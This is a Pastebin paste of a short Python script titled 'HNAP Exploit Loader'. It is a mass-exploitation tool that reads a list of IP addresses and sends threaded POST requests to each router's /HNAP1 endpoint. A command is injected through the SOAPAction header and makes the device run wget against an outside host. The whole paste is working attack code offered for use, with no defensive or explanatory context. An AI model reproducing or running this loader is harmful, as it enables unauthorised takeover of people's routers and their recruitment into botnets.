SHARE
TWEET

(UPnP) HNAP Exploit Loader | By; LiGhT

LNO_LiGhT Jan 8th, 2018 2,461 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! python !#
  2.  
  3. # HNAP Exploit | by; LiGhT
  4.  
  5. import threading, sys, time, random, socket, re, os, requests
  6.  
  7. ips = open(sys.argv[1], "r").readlines()
  8. payload = "<?xml version=\"1.0\" encoding=\"utf-8\"?><soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\"><soap:Body><AddPortMapping xmlns=\"http://purenetworks.com/HNAP1/\"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>"
  9. headerlist = {'SOAPAction': 'http://purenetworks.com/HNAP1/GetDeviceSettings/`cd /tmp && wget http://iplogger.co/2qWq45 -O-`'}
  10.  
  11. class pump(threading.Thread):
  12.     def __init__ (self, ip):
  13.         threading.Thread.__init__(self)
  14.         self.ip = str(ip).rstrip('\n')
  15.     def run(self):
  16.         try:
  17.             url = "http://"+ip+"/HNAP1"
  18.             url = re.sub('\n', '', url)
  19.             r = requests.post(url, timeout=5, headers=headerlist, data=payload)
  20.             print "[HNAP] Payload Sent %s"%(url)
  21.         except:
  22.             pass
  23.  
  24. for ip in ips:
  25.     try:
  26.         n = pump(ip)
  27.         n.start()
  28.     except:
  29.         pass
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top